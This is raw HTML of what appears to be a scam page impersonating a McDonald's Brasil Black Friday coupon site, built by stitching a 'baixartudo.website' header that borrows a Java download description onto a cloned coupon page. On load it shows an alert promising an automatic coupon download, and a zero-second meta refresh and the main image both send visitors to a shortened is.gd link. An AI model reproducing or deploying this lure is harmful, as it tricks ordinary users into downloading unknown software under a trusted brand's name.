
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="pt-BR" xml:lang="pt-BR">
<script language="JavaScript" type="text/javascript">
alert ("Baixe agora seu cupom Mc donalds da promoção Black friday !! download Começara Automaticamente")
</script>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta name="Language" content="pt-BR"/>
<meta name="ROBOTS" content="INDEX,FOLLOW"/>
<title>baixartudo.website</title>
<meta http-equiv="refresh" content="0; url=https://is.gd/YuMf1a">

	<meta name="description" content="Fa&ccedil;a o download do software Java para seu computador agora!"/>
	<meta name="keywords" content="java, downloads, software"/>


<meta name="date" content="2015-02-10"/>


<link rel="stylesheet" href="ga/css/screen.css" type="text/css" media="screen" charset="utf-8"/>
<link rel="stylesheet" href="ga/css/print.css" type="text/css" media="print" charset="utf-8"/> 

<meta http-equiv="X-UA-Compatible" content="IE=7" />
	

	<!--
	<script async="async" type="text/javascript" src='//consent.truste.com/notice?domain=oracle.com&c=teconsent&text=true&language=pt' crossorigin></script>
        -->
        <script async type="text/javascript" src='notice.js' crossorigin></script>
	<style type="text/css">
  		#teconsent a {
  			text-decoration: underline;
  		}
  
  		#teconsent a:hover {
  			text-decoration: none;
  		}
	</style>
</head>


</body>
</html>


<!doctype html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>Cupons McDonald&#39;s Brasil</title>
	<meta name="description" content="Confira as promoções e cupons do McDonald&#39;s Brasil"><meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width, minimal-ui">
	<link href="http://cupons.mcdonalds.com.br/image/475d055e0b8799a2f1007593cb94262d.png" rel="apple-touch-icon" />
	<link href="http://cupons.mcdonalds.com.br/image/475d055e0b8799a2f1007593cb94262d.png" rel="icon" />
	<link href="http://cupons.mcdonalds.com.br/image/f2ad5244e9e776ca83b4280e0f8f068d.png" rel="shortcut icon" /><meta name="smartbanner:title" content=""><meta name="smartbanner:author" content=""><meta name="smartbanner:price" content="FREE"><meta name="smartbanner:price-suffix-apple" content=" - On the App Store"><meta name="smartbanner:price-suffix-google" content=" - In Google Play"><meta name="smartbanner:icon-apple" content=""><meta name="smartbanner:icon-google" content=""><meta name="smartbanner:button" content=""><meta name="smartbanner:button-url-apple" content=""><meta name="smartbanner:button-url-google" content=""><meta name="smartbanner:enabled-platforms" content="android,ios">
	<link href="/public/vendor/smartbanner/smartbanner.css" rel="stylesheet" type="text/css" /><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black">
	<link data-fallback="/public/css/style.css" href="https://s3-sa-east-1.amazonaws.com/mcd-static/landing/css/style.css" rel="stylesheet" type="text/css" />
	<style type="text/css">body{
        
        background-color:#ffffff;
        
    }


    .header{
        position: relative;
        background-color:#aa0010
    }

    
        .logo{
            background-image:url('http://cupons.mcdonalds.com.br/image/475d055e0b8799a2f1007593cb94262d.png');
        border-color:#aa0010;
    }
    

    
    
    .block-footer{
        background-color:#aa0010;
    }
    .block-footer a {
        color:#fff;
    }
    .campaign-title, .exp-date {
        color:#000;
    }
    h2, h3 {
        color:#000;
    }
    .coupon p{
        background-color:#aa0010;
        color:#ffffff;
        border: 3px dashed #ffbe5a;
    }
    .view-more {
        color:#aa0010;
    }
    .button-color-campaign {
        color: #aa0010;
    }
    .view-more:hover {
        color: #ffbe5a;
    }
    .button-color,button.button-color, button.button-color-campaign {
        background-color:#ffbe5a;
        color:#aa0010;
    }
    .button-color .fa-star,  button.button-color-campaign .fa-star {
        color: #ffbe5a;
        background-color:#aa0010;
    }
    .description {
        background-color:#aa0010;
    }
    .description h3 {
        color:#ffbe5a;
    }
    .title-social {
        color:#000;
    }
    .fa-plus-circle {
        color:#000;
    }
    .powered {
        color:#000;
    }

    .coupon p{
        background-color:#aa0010;
        color:#ffffff;
        border: 3px dashed #ffbe5a;
    }

    @media (max-width: 600px) {
        .coupon p{
            border: 2px dashed #ffbe5a;
        }
    }

    .pdf {
        background-color:#ffbe5a;
        color:#aa0010;
    }

    /* Specific for: https://gigigo.atlassian.net/browse/AOPMCDBR-719 */
    .description a,
    .legal a {
        background: none !important;
    }
	</style>
</head>
<body>
<div class="container normal">
<div class="header">
<div class="logo normal"></div>
</div>         

<a class="block image image-center" href="https://is.gd/YuMf1a" onclick="analyticsCall.event('image', 'click', '')"><img alt="" src="https://i.imgur.com/2gi9GWo.png" /> </a>

<div class="campaigns-block" data-block-id="5ae1fba9709e3d14aca3be9c,5ab9004ce4b28226629f4407,5ab8f969dfc97d5f63fdc787,5acfa1f5a12a329764e98a61,5ab90006e400fde56488738e,5ab8f923cf3e60fb630ff717,5ab8f9cf9d3fa8d861e52143,5ab9008a9d3fa8d861e52144,B-5acfbd70581685be612dda15,B-5ac77f4457a91bc362cbe03a,B-5ac22aa8cf3e60fb631272e5,B-5ac226e1b0756cb164614bf0,B-5ac22667cff9c90c6224915b,B-5ac77f3a8ae8ef156471dda6,B-5ac77f3c2883df8961184963,B-5ad4e25cbfdbf6116376dcb6,B-5ad4e257cff9c90c62249dae,B-5ad4e251dfc97d5f63015c7f,B-5ad4e24cbfdbf6116376dcb5,B-5ad4e246cff9c90c62249dad,B-5ad4e241dfc97d5f63015c7e,B-5ad4e23cbfdbf6116376dcb4,B-5ad4e236cff9c90c62249dac" data-page-id="br">
<div class="preloader"></div>
<center>
<img src="https://i.imgur.com/ye96eQo.png" align="middle"><div class="prox-new-campaigns hide"></center>
<div class="message">
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Estamos preparando novos cupons de desconto para voc&ecirc;. <span>Aguarde!</span></p>
</div>
</div>

<div class="campaign hide bannerBlock">
<figure class="banner"><a class="banner-link" href="javascript:void(0)"><img class="image-banner" data-banner="banner" src="" /> </a>

<figcaption class="banner-title">
<h4 data-banner-title="title"></h4>
</figcaption>
</figure>
</div>

<div class="prototype campaign hide">
<div class="campaign-image">
<div>
<div class="multi-image" data-bg-image="image"></div>
</div>
</div>

<div class="footer">
<h4 class="campaign-title" data-title="text"></h4>

<p class="start-date hide">Aguarde! Come&ccedil;amos em <span>Start date</span></p>

<p class="exp-date">V&aacute;lido at&eacute;: <span data-date="date">PROMO&Ccedil;AO ENCERRADA</span></p>

<div class="buttons-campaigns">
<form action="/campaign/coupon/generate" method="post"><input name="campaignId" type="hidden" /> <input name="pageId" type="hidden" value="br" /><button class="button-color-campaign">PEGAR CUPOM</button></form>
<a class="view-more hvr-icon-grow" data-link="url">Veja mais</a></div>

<div class="expired-date hide" style="margin: 2.4rem 0 1.6rem;">PROMO&Ccedil;AO ENCERRADA</div>

<div class="not-avaible-date hide" style="margin: 2.4rem 0 1.6rem;">CAMPANHA N&Atilde;O DISPON&Iacute;VEL</div>
</div>
</div>

<div class="campaigns-block-container"></div>
</div>
<script>
    var scriptFiles = scriptFiles || [];
    var getCouponHomeEventAction = 'Click Get Coupon Home';
    var clickMoreHomeEventAction = 'Click See More Home';
    var staticUrl = 'http://cupons.mcdonalds.com.br/image/';
    scriptFiles.push('/public/js/campaigns.min.js');
</script>

<div class="push"></div>

<div class="block-footer" data-block-id="55e5dea7cbeb1eca46739986">
<ul>
	<li><a class="link" href="#" id="">&copy; McDonald&#39;s Brasil 2017 - Termos e Condi&ccedil;&otilde;es</a> <span class="text" data-slug="© McDonald's Brasil 2017 - Termos e Condições"> </span>

	<h4><span class="text" data-slug="© McDonald's Brasil 2017 - Termos e Condições">&copy; McDonald&#39;s Brasil 2017  macnba- Termos e Condi&ccedil;&otilde;es </span></h4>
	<span class="text" data-slug="© McDonald's Brasil 2017 - Termos e Condições"> </span></li>
</ul>
</div>
</div>
</body>
</html>